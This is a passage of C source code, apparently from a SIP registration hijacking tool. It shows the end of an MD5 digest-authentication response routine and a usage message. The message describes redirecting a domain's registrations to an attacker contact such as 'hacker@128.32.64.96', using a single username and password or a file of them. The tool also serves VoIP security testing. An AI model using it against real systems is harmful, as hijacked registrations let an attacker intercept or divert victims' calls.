      MD5Update(&Md5Ctx, pszNonce, strlen(pszNonce));
      MD5Update(&Md5Ctx, ":", 1);
      if (*pszQop) {
          MD5Update(&Md5Ctx, pszNonceCount, strlen(pszNonceCount));
          MD5Update(&Md5Ctx, ":", 1);
          MD5Update(&Md5Ctx, pszCNonce, strlen(pszCNonce));
          MD5Update(&Md5Ctx, ":", 1);
          MD5Update(&Md5Ctx, pszQop, strlen(pszQop));
          MD5Update(&Md5Ctx, ":", 1);
      }
      MD5Update(&Md5Ctx, HA2Hex, HASHHEXLEN);
      MD5Final(RespHash, &Md5Ctx);
      CvtHex(RespHash, Response);
}

//-------------------------------------------------------------------------------
//      usage 
//
//      ret:  none
//-------------------------------------------------------------------------------
void  usage ( void )
{	
    printf ( "\n%s", __REGHIJACKER_VERSION );
    printf ( "\n%s", __REGHIJACKER_DATE    );
    
    printf ( "\n Usage:"                                                        );
    printf ( "\n Mandatory -"                                                   );
    printf ( "\n \tinterface (e.g. eth0)"                                       );
    printf ( "\n \tdomain to hijack (e.g. enterprise.com or an IPv4 address)"   );
    //  FIXME - the next parm should not be required, DNS should be used to determine it
    printf ( "\n \tIPv4 addr of the domain's Registrar"                         );
    printf ( "\n \thijack contact info (e.g. hacker@128.32.64.96 )"             );
    printf ( "\n \tfilename into which results are written"                     );
    printf ( "\n \tone of the following sets of options:"                       );
    printf ( "\n \t\t-f filename containing user names and passwords to hijack" );
    printf ( "\n \t\t\tor"                                                      );
    printf ( "\n \t\t-u username"                                               );
    printf ( "\n \t\t-p password"                                               );
    printf ( "\n Optional -"                                                    );
    printf ( "\n \t-s sleep interval btwn hijacks - in usec: default is none"   );
    printf ( "\n \t-v print in verbose mode\n"                                  );
    printf ( "\n"                                                               );

    exit ( EXIT_FAILURE );
}

